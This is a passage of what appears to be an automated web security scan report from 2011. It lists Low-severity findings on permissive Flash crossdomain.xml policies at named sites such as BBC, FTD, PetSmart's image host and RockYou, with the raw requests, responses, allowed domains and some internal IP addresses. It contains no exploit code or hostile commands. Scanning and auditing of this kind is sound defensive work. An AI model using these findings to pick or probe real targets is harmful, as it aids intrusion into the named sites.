<allow-access-from domain="202.44.56.2"/>
<allow-access-from domain="202.44.58.2"/>
<allow-access-from domain="beta.graco.com"/>
<allow-access-from domain="*.burton.com"/>
<allow-access-from domain="*.ashleyfurniture.com" />
<allow-access-from domain="*.ashleyfurniturehomestore.com" />
<allow-access-from domain="s7sps1-staging.scene7.com" />
<allow-access-from domain="s7sps1.scene7.com" />
<allow-access-from domain="*.lokion.com"/>
<allow-access-from domain="*.vikingrange.com"/>
<allow-access-from domain="www.armstrong.com"/>
<allow-access-from domain="*.classscene.com"/>
<allow-access-from domain="*.classsceneqa.com"/>
<allow-access-from domain="*.classscenedemo.com"/>
<allow-access-from domain="*.fulltiltboots.com"/>
<allow-access-from domain="*.ridesnowboards.com"/>
<allow-access-from domain="*.karhuskico.com"/>
<allow-access-from domain="*.k2women.com"/>
<allow-access-from domain="*.k2snowboarding.com"/>
<allow-access-from domain="*.k2skis.com"/>
<allow-access-from domain="*.ridesnowboards.com"/>
<allow-access-from domain="*.lineskis.com"/>
<allow-access-from domain="*.5150snowboarding.com"/>
<allow-access-from domain="*.morrowsnowboards.com"/>
<allow-access-from domain="*.atlassnowshoe.com"/>
<allow-access-from domain="*.tubbssnowshoes.com"/>
<allow-access-from domain="*.k2telemark.com"/>
<allow-access-from domain="*.k2dealertools.com"/>
<allow-access-from domain="*.planet-earth-clothing.com"/>
<allow-access-from domain="*.k2skates.com"/>
<allow-access-from domain="*.k2iceskates.com"/>
<allow-access-from domain="*.snowshoes.com"/>
<allow-access-from domain="*.vashonstorefront.com"/>
<allow-access-from domain="*.adiofootwear.com"/>
<allow-access-from domain="*.adio.com"/>
<allow-access-from domain="4.59.112.138"/>
<allow-access-from domain="store.americangirl.com"/>
<allow-access-from domain="*.store.americangirl.com"/>
<allow-access-from domain="agpmt-prod:7778"/>
<allow-access-from domain="agpmt-test:7777"/>
<allow-access-from domain="s7demo.host.adobe.com"/>
<allow-access-from domain="*.jcpenney.com"/>
<allow-access-from domain="*.teamzonesports.com"/>
<allow-access-from domain="*.underarmour.com"/>
<allow-access-from domain="broadridge.mominc.com"/>
<allow-access-from domain="*.craftsman.com"/>
<allow-access-from domain="*.sothebys.com"/>
<allow-access-from domain="*.facebook.com"/>
<allow-access-from domain="*.thuzi.com"/>
<allow-access-from domain="*.samsclub.com"/>
<allow-access-from domain="161.169.79.10"/>
<allow-access-from domain="store.americangirl.com"/>
<allow-access-from domain="*.hansondodge.com"/>
<allow-access-from domain="*.thebrick.com"/>
<allow-access-from domain="s7demo.scene7.com"/>
<allow-access-from domain="*.richrelevance.com"/>
<allow-access-from domain="*.hit.homedepot.resource.com"/>
<allow-access-from domain="*.allurent.net"/>
<allow-access-from domain="*.ashro.com"/>
<allow-access-from domain="*.countrydoor.com"/>
<allow-access-from domain="*.ginnys.com"/>
<allow-access-from domain="*.grandpointe.com"/>
<allow-access-from domain="*.monroeandmain.com"/>
<allow-access-from domain="*.midnightvelvet.com"/>
<allow-access-from domain="*.raceteamgear.com"/>
<allow-access-from domain="*.swisscolony.com"/>
<allow-access-from domain="*.seventhavenue.com"/>
<allow-access-from domain="*.homevisions.com"/>
<allow-access-from domain="*.wards.com"/>
<allow-access-from domain="*.tenderfilet.com"/>
<allow-access-from domain="assets.k2sports.com"/>
<allow-access-from domain="assets.ridesnowboards.com"/>
<allow-access-from domain="assets1.k2sports.com"/>
<allow-access-from domain="assets1.ridesnowboards.com"/>
<allow-access-from domain="assets2.k2sports.com"/>
<allow-access-from domain="assets2.ridesnowboards.com"/>
<allow-access-from domain="161.211.2.28"/>
<allow-access-from domain="161.211.155.7"/>
<allow-access-from domain="ah-stg.fry.com"/>
<allow-access-from domain="cd-stg.fry.com"/>
<allow-access-from domain="gn-stg.fry.com"/>
<allow-access-from domain="gp-stg.fry.com"/>
<allow-access-from domain="hv-stg.fry.com"/>
<allow-access-from domain="mm-stg.fry.com"/>
<allow-access-from domain="mv-stg.fry.com"/>
<allow-access-from domain="mw-stg.fry.com"/>
<allow-access-from domain="rt-stg.fry.com"/>
<allow-access-from domain="rc-stg.fry.com"/>
<allow-access-from domain="tf-stg.fry.com"/>
<allow-access-from domain="sc-stg.fry.com"/>
<allow-access-from domain="sa-stg.fry.com"/>
<allow-access-from domain="shopdeluxe-v9-dev.deluxe.com" secure="true"/>
...[SNIP]...
<allow-access-from domain="shopdeluxe-v9-uat.deluxe.com" secure="true"/>
...[SNIP]...
<allow-access-from domain="stage.coach.com"/>
<allow-access-from domain="*.coach.com"/>
<allow-access-from domain="demandware.edgesuite.net"/>
<allow-access-from domain="*.buildabear.com"/>
<allow-access-from domain="*.babwtest.com"/>
<allow-access-from domain="customshop.mesfire.com"/>
<allow-access-from domain="stage.homeinspiration.homedepot.com "/>
<allow-access-from domain="homeinspiration.homedepot.com"/>
<allow-access-from domain="pointroll.com"/>
<allow-access-from domain="*.pointroll.com"/>
<allow-access-from domain="*.smartwool.com"/>
<allow-access-from domain="*.summitprojects.com"/>
<allow-access-from domain="*.nike.com"/>
<allow-access-from domain="511.niteviewtech.com"/>
<allow-access-from domain="www.lauramercier.com"/>
<allow-access-from domain="*.lumberliquidators.com"/>
<allow-access-from domain="*.ae.com"/>
<allow-access-from domain="*.aezone.com"/>
<allow-access-from domain="s7everest.macromedia.com"/>
<allow-access-from domain="s7fuji.macromedia.com"/>
<allow-access-from domain="s7qa-is.macromedia.com"/>
<allow-access-from domain="officemax.companychecksandforms.com"/>
<allow-access-from domain="www.511deasbf.com"/>
<allow-access-from domain="*.511deasbf.com"/>
<allow-access-from domain="*.vcfcorp.com"/>
...[SNIP]...
<allow-access-from domain="*.asfurniture.com"/>
<allow-access-from domain="*.vcf.com"/>
...[SNIP]...
<allow-access-from domain="anthropologie.uat.venda.com"/>
<allow-access-from domain="anthropologie.live.venda.com"/>
<allow-access-from domain="*.511academy.com"/>
<allow-access-from domain="*.reedkrakoff.com"/>
<allow-access-from domain="stage.wearport.com"/>
<allow-access-from domain="*.macys.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.fds.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="macys.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="fds.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.*.fds.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.*.macys.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="www.anthropologie.eu"/>
<allow-access-from domain="s7demo.host.adobe.com"/>
<allow-access-from domain="www.leadbased.com"/>
<allow-access-from domain="*.mxbi.com"/>
<allow-access-from domain="*.jordans.com"/>
<allow-access-from domain="jordans.com"/>
<allow-access-from domain="jordansqa.weymouthdesign.com"/>
<allow-access-from domain="*.mercury.com"/>
<allow-access-from domain="*.cb2.com"/>
<allow-access-from domain="*.landofnod.com"/>
<allow-access-from domain="*.crateandbarrel.com"/>
<allow-access-from domain="*.crateandbarrel.ca"/>
<allow-access-from domain="cim-dev.deluxe.com"/>
<allow-access-from domain="cim-qa.deluxe.com"/>
<allow-access-from domain="www.deluxe-check-order.com"/>
<allow-access-from domain="wwwpreprod.deluxe-check-order.com"/>
<allow-access-from domain="*.vfimagewear.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.zumiez.com"/>
<allow-access-from domain="zumiez.com"/>
<allow-access-from domain="*.vfc.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="service-apps.scene7.com"/>
<allow-access-from domain="service-apps-staging.scene7.com"/>
<allow-access-from domain="walmart.scene7.com"/>
<allow-access-from domain="s7ondemand1-apps-staging.scene7.com"/>
<allow-access-from domain="63.241.188.118"/>
<allow-access-from domain="63.241.188.119"/>
<allow-access-from domain="63.241.188.116"/>
<allow-access-from domain="63.241.188.120"/>
<allow-access-from domain="63.241.188.121"/>
<allow-access-from domain="63.241.188.117"/>
<allow-access-from domain="63.241.188.122"/>
<allow-access-from domain="63.241.188.123"/>
<allow-access-from domain="63.241.188.124"/>
<allow-access-from domain="63.241.188.125"/>
<allow-access-from domain="stage.store.americangirl.com"/>
<allow-access-from domain="*.kohls.com" secure="true"/>
...[SNIP]...
<allow-access-from domain="media.kohls.com.edgesuite.net" secure="true"/>
...[SNIP]...
<allow-access-from domain="*.edgeboss.net" secure="true"/>
...[SNIP]...
<allow-access-from domain="*.kohlscorporation.com" secure="true"/>
...[SNIP]...
<allow-access-from domain="*.kohlscareers.com" secure="true"/>
...[SNIP]...
<allow-access-from domain="*.kohlsoncampus.com" secure="true"/>
...[SNIP]...
<allow-access-from domain="*.apiservice.net" secure="true"/>
...[SNIP]...
<allow-access-from domain="98.129.79.154" secure="true"/>
...[SNIP]...
<allow-access-from domain="www.factory515.com" secure="true"/>
...[SNIP]...
<allow-access-from domain="httpCDN.factory515.com" secure="true"/>
...[SNIP]...
<allow-access-from domain="rtmpCDN.factory515.com" secure="true"/>
...[SNIP]...
<allow-access-from domain="*.mixercast.com" secure="true"/>
...[SNIP]...
<allow-access-from domain="*.fluid.com"/>
<allow-access-from domain="*.enlighten.com"/>
<allow-access-from domain="*.hunterdouglas.com"/>
<allow-access-from domain=".allurent.net" secure="true"/>
...[SNIP]...
<allow-access-from domain="64.52.70.13"/>
<allow-access-from domain="64.52.70.30"/>
<allow-access-from domain="64.52.70.33"/>
<allow-access-from domain="64.52.70.60"/>
<allow-access-from domain="76.12.61.174"/>
<allow-access-from domain="*.kmart.com"/>
<allow-access-from domain="skavamp.com"/>
<allow-access-from domain="*.skavamp.com"/>
<allow-access-from domain="*.cloudfront.net"/>
<allow-access-from domain="www.grandinroad.com"/>
<allow-access-from domain="www.frontgate.com"/>
<allow-access-from domain="97.65.222.116"/>
<allow-access-from domain="97.65.222.115"/>
<allow-access-from domain="*.neptune.com"/>
<allow-access-from domain="*.colehaan.com"/>
<allow-access-from domain="*.web.rga.com"/>
<allow-access-from domain="*.ny.rga.com"/>
<allow-access-from domain="content01.nimblefish.com"/>
<allow-access-from domain="cdn.nimblefish.com"/>
<allow-access-from domain="media.nimblefish.com"/>
<allow-access-from domain="nv.nimblefish.com"/>
<allow-access-from domain="app.nimblefish.com"/>
<allow-access-from domain="media.beta01.nimblefish.com"/>
<allow-access-from domain="nv.beta01.nimblefish.com"/>
<allow-access-from domain="app.beta01.nimblefish.com"/>
<allow-access-from domain="media.content01.nimblefish.com"/>
<allow-access-from domain="nv.content01.nimblefish.com"/>
<allow-access-from domain="app.content01.nimblefish.com"/>
<allow-access-from domain="*.511fbileeda.com"/>
<allow-access-from domain="*.criticalmass.com"/>
<allow-access-from domain="*.theodorealexander.com"/>
<allow-access-from domain="*.criticalmass.com"/>
<allow-access-from domain="*.theodorealexander.com"/>
<allow-access-from domain="*.hottopic.com"/>
<allow-access-from domain="*.teamworkathletic.com "/>
<allow-access-from domain="*.scene7.com"/>
<allow-access-from domain="*.shopvcf.com"/>
<allow-access-from domain="shopvcf.com"/>
<allow-access-from domain="*.axelscript.com"/>
<allow-access-from domain="*.sherwin.com" secure="true"/>
...[SNIP]...
<allow-access-from domain="*.sherwin-williams.com" secure="true"/>
...[SNIP]...
<allow-access-from domain="*.resource.com" secure="true"/>
...[SNIP]...
<allow-access-from domain="*flashmaxx.com"/>
<allow-access-from domain="searsfb.indelible.tv"/>
<allow-access-from domain="*.serving-sys.com"/>
<allow-access-from domain="*.modea.com"/>
<allow-access-from domain="*.mizunousa.com"/>
<allow-access-from domain="*.mizunorunning.com"/>
<allow-access-from domain="*.mizunocda.com"/>
<allow-access-from domain="*.footjoy.com"/>
<allow-access-from domain="*.footjoy.co.uk"/>
<allow-access-from domain="*.footjoy.com.fr"/>
<allow-access-from domain="*.footjoy.de"/>
<allow-access-from domain="*.footjoy.se"/>
<allow-access-from domain="*.footjoy.ca"/>
<allow-access-from domain="*.footjoy.com.au"/>
<allow-access-from domain="*.footjoy.jp"/>
<allow-access-from domain="*.footjoy.co.th"/>
<allow-access-from domain="*.footjoy.com.my"/>
<allow-access-from domain="*.footjoy.com.sg"/>
<allow-access-from domain="*.footjoy.co.kr"/>
<allow-access-from domain="*.footjoy.com.cn"/>
<allow-access-from domain="pitchinteractive.com"/>
<allow-access-from domain="*.indelible.tv" secure="true" />
...[SNIP]...
<allow-access-from domain="indelible.tv" secure="true" />
...[SNIP]...
<allow-access-from domain="flashmaxx.com" secure="true" />
...[SNIP]...
<allow-access-from domain="searsfb.indelible.tv" secure="true" />
...[SNIP]...
<allow-access-from domain="ec2-184-72-166-175.compute-1.amazonaws.com"/>
<allow-access-from domain="*.getpapered.com"/>
<allow-access-from domain="*.englishpapercompany.com"/>
<allow-access-from domain="*.koolsquare.net"/>
<allow-access-from domain="*.target.com"/>
<allow-access-from domain="*.home.agilent.com" secure="true" />
...[SNIP]...
<allow-access-from domain="*.cos.agilent.com" secure="true" />
...[SNIP]...
<allow-access-from domain="*.lvld.agilent.com" secure="true" />
...[SNIP]...
<allow-access-from domain="cp.agilent.com" secure="true" />
...[SNIP]...
<allow-access-from domain="www.agilent.com" secure="true" />
...[SNIP]...
<allow-access-from domain="www.agilent.at" secure="true" />
...[SNIP]...
<allow-access-from domain="www.agilent.be" secure="true" />
...[SNIP]...
<allow-access-from domain="www.agilent.ca" secure="true" />
...[SNIP]...
<allow-access-from domain="www.agilent.ch" secure="true" />
...[SNIP]...
<allow-access-from domain="www.agilent.cl" secure="true" />
...[SNIP]...
<allow-access-from domain="www.agilent.co.hu" secure="true" />
...[SNIP]...
<allow-access-from domain="www.agilent.co.il" secure="true" />
...[SNIP]...
<allow-access-from domain="www.agilent.co.in" secure="true" />
...[SNIP]...
<allow-access-from domain="www.agilent.co.jp" secure="true" />
...[SNIP]...
<allow-access-from domain="www.agilent.co.kr" secure="true" />
...[SNIP]...
<allow-access-from domain="www.agilent.co.nz" secure="true" />
...[SNIP]...
<allow-access-from domain="www.agilent.co.th" secure="true" />
...[SNIP]...
<allow-access-from domain="www.agilent.co.uk" secure="true" />
...[SNIP]...
<allow-access-from domain="www.agilent.com.ar" secure="true" />
...[SNIP]...
<allow-access-from domain="www.agilent.com.au" secure="true" />
...[SNIP]...
<allow-access-from domain="www.agilent.com.br" secure="true" />
...[SNIP]...
<allow-access-from domain="www.agilent.com.cn" secure="true" />
...[SNIP]...
<allow-access-from domain="www.agilent.com.co" secure="true" />
...[SNIP]...
<allow-access-from domain="www.agilent.com.hk" secure="true" />
...[SNIP]...
<allow-access-from domain="www.agilent.com.mx" secure="true" />
...[SNIP]...
<allow-access-from domain="www.agilent.com.my" secure="true" />
...[SNIP]...
<allow-access-from domain="www.agilent.com.pe" secure="true" />
...[SNIP]...
<allow-access-from domain="www.agilent.com.ph" secure="true" />
...[SNIP]...
<allow-access-from domain="www.agilent.com.pl" secure="true" />
...[SNIP]...
<allow-access-from domain="www.agilent.com.pr" secure="true" />
...[SNIP]...
<allow-access-from domain="www.agilent.com.ru" secure="true" />
...[SNIP]...
<allow-access-from domain="www.agilent.com.sg" secure="true" />
...[SNIP]...
<allow-access-from domain="www.agilent.com.tr" secure="true" />
...[SNIP]...
<allow-access-from domain="www.agilent.com.tw" secure="true" />
...[SNIP]...
<allow-access-from domain="www.agilent.com.ve" secure="true" />
...[SNIP]...
<allow-access-from domain="www.agilent.cz" secure="true" />
...[SNIP]...
<allow-access-from domain="www.agilent.de" secure="true" />
...[SNIP]...
<allow-access-from domain="www.agilent.dk" secure="true" />
...[SNIP]...
<allow-access-from domain="www.agilent.ee" secure="true" />
...[SNIP]...
<allow-access-from domain="www.agilent.es" secure="true" />
...[SNIP]...
<allow-access-from domain="www.agilent.fi" secure="true" />
...[SNIP]...
<allow-access-from domain="www.agilent.fr" secure="true" />
...[SNIP]...
<allow-access-from domain="www.agilent.gr" secure="true" />
...[SNIP]...
<allow-access-from domain="www.agilent.ie" secure="true" />
...[SNIP]...
<allow-access-from domain="www.agilent.it" secure="true" />
...[SNIP]...
<allow-access-from domain="www.agilent.lu" secure="true" />
...[SNIP]...
<allow-access-from domain="www.agilent.nl" secure="true" />
...[SNIP]...
<allow-access-from domain="www.agilent.no" secure="true" />
...[SNIP]...
<allow-access-from domain="www.agilent.pt" secure="true" />
...[SNIP]...
<allow-access-from domain="www.agilent.ru" secure="true" />
...[SNIP]...
<allow-access-from domain="www.agilent.se" secure="true" />
...[SNIP]...
<allow-access-from domain="www.agilent.us" secure="true" />
...[SNIP]...
<allow-access-from domain="*.brooksbrothers.com"/>
<allow-access-from domain="*.whitneyenglish.com"/>
<allow-access-from domain="canadiantire.ca"/>
<allow-access-from domain="*.maxnow.com"/>
<allow-access-from domain="4.59.112.158"/>
<allow-access-from domain="*.nike.com"/>
<allow-access-from domain="*.converse.com" secure="false" />
...[SNIP]...
<allow-access-from domain="converse.com" secure="false" />
...[SNIP]...
<allow-access-from domain="*.converse.co.uk" secure="false"/>
...[SNIP]...
<allow-access-from domain="converse.co.uk" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.cust.aops-eds.com"/>
<allow-access-from domain="*.colehaan.com"/>
<allow-access-from domain="kobe.nike.jess3.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.highschoolsports.net" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.kb24.com" secure="false" />
...[SNIP]...
<allow-access-from domain="kb24.com" secure="false" />
...[SNIP]...
<allow-access-from domain="*.skysports.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.lequipe.fr" secure="false"/>
...[SNIP]...
<allow-access-from domain="converse.digitas.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.staging.groundctrl.net" secure="false"/>
...[SNIP]...
<allow-access-from domain="staging.groundctrl.net" secure="false"/>
...[SNIP]...
<allow-access-from domain="siteinnovation.digitas.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="siteinnovationdev.digitas.com" secure="false" />
...[SNIP]...
<allow-access-from domain="*.ny.rga.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.nikedev.framfab.dk" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.akqa.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.ostkcdn.com"/>
<allow-access-from domain="*.aggregateknowledge.com"/>
<allow-access-from domain="*.nikedev.com"/>
<allow-access-from domain="anthrode.uat.venda.com"/>
<allow-access-from domain="anthropologie.custqa.venda.com"/>
<allow-access-from domain="*.fingerhut.com"/>
<allow-access-from domain="*.gettington.com"/>
...[SNIP]...

6.65. http://newsrss.bbc.co.uk/crossdomain.xml previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://newsrss.bbc.co.uk
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: newsrss.bbc.co.uk

Response

HTTP/1.0 200 OK
Server: Apache
Last-Modified: Wed, 20 Apr 2011 09:07:59 GMT
Content-Type: text/xml
Cache-Control: max-age=120
Expires: Mon, 16 May 2011 10:43:05 GMT
Date: Mon, 16 May 2011 10:41:05 GMT
Content-Length: 1081
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
   <site-control permitted-cross-domain-policies="master-o
...[SNIP]...
<allow-access-from domain="downloads.bbc.co.uk" />
   <allow-access-from domain="www.bbcamerica.com" />
   <allow-access-from domain="*.bbcamerica.com" />
   <allow-access-from domain="www.bbc.co.uk" />
   <allow-access-from domain="news.bbc.co.uk" />
   <allow-access-from domain="newsimg.bbc.co.uk"/>
   <allow-access-from domain="nolpreview11.newsonline.tc.nca.bbc.co.uk" />
...[SNIP]...
<allow-access-from domain="newsapi.bbc.co.uk" />
   <allow-access-from domain="extdev.bbc.co.uk" />
   <allow-access-from domain="stats.bbc.co.uk" />
   <allow-access-from domain="*.bbc.co.uk"/>
   <allow-access-from domain="*.bbci.co.uk"/>
   <allow-access-from domain="*.bbc.com"/>
...[SNIP]...
<allow-access-from domain="jam.bbc.co.uk" />
   <allow-access-from domain="dc01.dc.bbc.co.uk" />
...[SNIP]...

6.66. https://ordering.ftd.com/crossdomain.xml previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	https://ordering.ftd.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: ordering.ftd.com

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 02:10:00 GMT
Server: Apache
Set-Cookie: TLTSID=9AA032847F61107F002288ADA5203D48; Path=/; Domain=.ftd.com
Set-Cookie: TLTUID=9AA032847F61107F002288ADA5203D48; Path=/; Domain=.ftd.com; expires=Mon, 16-05-2021 02:10:00 GMT
Vary: Accept-Encoding
Last-Modified: Wed, 13 Apr 2011 04:16:29 GMT
ETag: "fb-4da5239d"
Accept-Ranges: bytes
Content-Length: 251
Connection: close
Content-Type: text/xml

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*.ftd.com" />
<allow-access-from domain="*.ftdimg.com" />
...[SNIP]...

6.67. http://pet.imageg.net/crossdomain.xml previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://pet.imageg.net
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: pet.imageg.net

Response

HTTP/1.0 200 OK
Server: Apache/2.0.63 (Unix)
Last-Modified: Thu, 08 May 2008 01:49:36 GMT
ETag: "53c78d-30d-44cae4b2b6c00"
X-UA-Compatible: IE=EmulateIE7
Content-Type: application/xml
Cache-Control: max-age=172800
Expires: Wed, 18 May 2011 10:49:57 GMT
Date: Mon, 16 May 2011 10:49:57 GMT
Content-Length: 781
Connection: close

<?xml version="1.0"?>

<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="www.petsmart.com" secure="true" />
...[SNIP]...
<allow-access-from domain="*.petsmart.com" secure="true" />
...[SNIP]...
<allow-access-from domain="*.gspt.net" secure="true" />
...[SNIP]...
<allow-access-from domain="*.gsipartners.com" secure="true" />
...[SNIP]...
<allow-access-from domain="172.20.1.172" />
<allow-access-from domain="172.21.1.172" />
<allow-access-from domain="206.16.220.172" />
<allow-access-from domain="63.240.110.172" />
<allow-access-from domain="preview.gsipartners.com" secure="true" />
...[SNIP]...

6.68. http://rya.rockyou.com/crossdomain.xml previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://rya.rockyou.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: rya.rockyou.com

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 02:01:38 GMT
Server: Apache/2.2
Last-Modified: Wed, 06 Apr 2011 23:33:16 GMT
ETag: "4ff-4a0486ac18700"
Accept-Ranges: bytes
Content-Length: 1279
Vary: Accept-Encoding,User-Agent
X-RyHeader: www114.rockyou.com took D=104 microseconds to serve this request
P3P: CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Connection: close
Content-Type: text/xml

<cross-domain-policy>
<site-control permitted-cross-domain-policies="all"/>
<allow-access-from domain="*.rockmyspace.com" to-ports="*" />
<allow-access-from domain="*.rockyou.com" to-ports="*" />
...[SNIP]...
<allow-access-from domain="rockmyspace.com" to-ports="*" />
...[SNIP]...
<allow-access-from domain="rockyou.com" to-ports="*" />
...[SNIP]...
<allow-access-from domain="*.meebo.com" to-ports="*" />
<allow-access-from domain="*.rockyou-internal.com" to-ports="*" />
<allow-access-from domain="*.ministryofwar.com" to-ports="*"/>
<allow-access-from domain="api.msappspace.com" to-ports="*" />
...[SNIP]...
<allow-access-from domain="*.yahoo.net" to-ports="80" />
...[SNIP]...
<allow-access-from domain="*.yimg.com" to-ports="80" />
...[SNIP]...
<allow-access-from domain="x.mochiads.com" to-ports="80" />
...[SNIP]...
<allow-access-from domain="www.mochiads.com" to-ports="80" />
...[SNIP]...
<allow-access-from domain="www.mochimedia.com" to-ports="80" />
...[SNIP]...
<allow-access-from domain="*.rockyoucdn1.com" to-ports="*" />
...[SNIP]...
<allow-access-from domain="*.rockyoucdn2.com" to-ports="*" />
...[SNIP]...
<allow-access-from domain="*.rockyoucdn3.com" to-ports="*" />
...[SNIP]...
<allow-access-from domain="*.rockyoucdn4.com" to-ports="*" />
...[SNIP]...

6.69. http://s7.orientaltrading.com/crossdomain.xml previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://s7.orientaltrading.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: s7.orientaltrading.com

Response

HTTP/1.0 200 OK
Server: Apache-Coyote/1.1
Accept-Ranges: bytes
ETag: W/"25343-1305036218000"
Last-Modified: Tue, 10 May 2011 14:03:38 GMT
Content-Type: application/xml
Content-Length: 25343
Expires: Mon, 16 May 2011 11:58:49 GMT
Date: Mon, 16 May 2011 01:58:49 GMT
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*.laneventure.com"/>
<allow-access-from domain="*.pearsonco.com"/>
<allow-access-from domain="*.targetimg1.com"/>
<allow-access-from domain="*.targetimg2.com"/>
<allow-access-from domain="*.targetimg3.com"/>
<allow-access-from domain="*.agilent.com"/>
<allow-access-from domain="*.artvan.com"/>
<allow-access-from domain="*.mizunogolf.com"/>
<allow-access-from domain="*.talbots.com"/>
<allow-access-from domain="giftadvisor.indelible.tv"/>
<allow-access-from domain="*.taaz.com"/>
<allow-access-from domain="www.flashmaxx.com"/>
<allow-access-from domain="flashmaxx.com"/>
<allow-access-from domain="searsfb.indelible.tv"/>
<allow-access-from domain="*.armstrong.com"/>
<allow-access-from domain="ag2010.stage.ascedia.com"/>
<allow-access-from domain="sassomedia.com"/>
<allow-access-from domain="*.photoshop.com"/>
<allow-access-from domain="kijones.host.adobe.com"/>
<allow-access-from domain="ag2010.stage.ascedia.com"/>
<allow-access-from domain="*.trex.com"/>
<allow-access-from domain="*.trexco.com"/>
<allow-access-from domain="*.vermontcountrystore.com"/>
<allow-access-from domain="*.pabng.com"/>
<allow-access-from domain="s7sps3.scene7.com"/>
<allow-access-from domain="*.morrowsnowboards.com"/>
<allow-access-from domain="*.k2admin.com"/>
<allow-access-from domain="*.deluxe.com" secure="true"/>
...[SNIP]...
<allow-access-from domain="*.shopdeluxe.com" secure="true"/>
...[SNIP]...
<allow-access-from domain="*.nimblefish.com" secure="true"/>
...[SNIP]...
<allow-access-from domain="*.fossil.com"/>
<allow-access-from domain="www.michele.com"/>
<allow-access-from domain="127.0.0.1" secure="true"/>
...[SNIP]...
<allow-access-from domain="www.polarisindustries.com"/>
<allow-access-from domain="backstage.polarisindustries.com"/>
<allow-access-from domain="s7diod-isorigin.scene7.com"/>
<allow-access-from domain="origin-na1.scene7.com"/>
<allow-access-from domain="origin-na2.scene7.com"/>
<allow-access-from domain="origin-na3.scene7.com"/>
<allow-access-from domain="origin-na4.scene7.com"/>
<allow-access-from domain="origin-na5.scene7.com"/>
<allow-access-from domain="origin-na6.scene7.com"/>
<allow-access-from domain="origin-na7.scene7.com"/>
<allow-access-from domain="origin-na8.scene7.com"/>
<allow-access-from domain="s7d1.scene7.com"/>
<allow-access-from domain="s7d2.scene7.com"/>
<allow-access-from domain="s7d3.scene7.com"/>
<allow-access-from domain="s7d4.scene7.com"/>
<allow-access-from domain="s7ondemand1.scene7.com"/>
<allow-access-from domain="irtex1.scene7.com"/>
<allow-access-from domain="10.80.1.144"/>
<allow-access-from domain="10.80.1.152"/>
<allow-access-from domain="10.80.1.42"/>
<allow-access-from domain="origin-apps.scene7.com"/>
<allow-access-from domain="s7ondemand1-apps.scene7.com"/>
<allow-access-from domain="isstaging.scene7.com"/>
<allow-access-from domain="techservices.scene7.com"/>
<allow-access-from domain="ecomtest1.hancockms.com"/>
<allow-access-from domain="www.hancockfabrics.com"/>
<allow-access-from domain="www.eddiebauer.com"/>
<allow-access-from domain="dev.eddiebauer.com"/>
<allow-access-from domain="qa.eddiebauer.com"/>
<allow-access-from domain="testvipd1.scene7.com"/>
<allow-access-from domain="testvipd2.scene7.com"/>
<allow-access-from domain="testvipd3.scene7.com"/>
<allow-access-from domain="testvipd4.scene7.com"/>
<allow-access-from domain="s7ondemand3.scene7.com"/>
<allow-access-from domain="s7ondemand7.scene7.com"/>
<allow-access-from domain="s7ips1.scene7.com"/>
<allow-access-from domain="s7ondemand5.scene7.com"/>
<allow-access-from domain="*.sample.scene7.com"/>
<allow-access-from domain="origin-search.scene7.com"/>
<allow-access-from domain="staging.scene7.com"/>
<allow-access-from domain="s7testis.adobe.com"/>
<allow-access-from domain="sportstown.crosscomm.net"/>
<allow-access-from domain="sportstown.com"/>
<allow-access-from domain="*.sportstown.com"/>
<allow-access-from domain="www.anthropologie.com"/>
<allow-access-from domain="staging.anthropologie.us"/>
<allow-access-from domain="smartwool.dev.summitprojects.com"/>
<allow-access-from domain="smartwool.stage.summitprojects.com"/>
<allow-access-from domain="www.smartwool.com"/>
<allow-access-from domain="s7d5.scene7.com"/>
<allow-access-from domain="testvipd5.scene7.com"/>
<allow-access-from domain="www.roadrunnersports.com"/>
<allow-access-from domain="dev.atgnow.com"/>
<allow-access-from domain="staging.roadrunnersports.com"/>
<allow-access-from domain="*.sportstown.com" secure="true"/>
...[SNIP]...
<allow-access-from domain="sportstown.com" secure="true"/>
...[SNIP]...
<allow-access-from domain=" s7.sears.com "/>
<allow-access-from domain="*.myctmh.com"/>
<allow-access-from domain="*.burton.com"/>
<allow-access-from domain="*.instrum3nt.com"/>
<allow-access-from domain="*.tommybahama.com"/>
<allow-access-from domain="demo.ml.nurun.com"/>
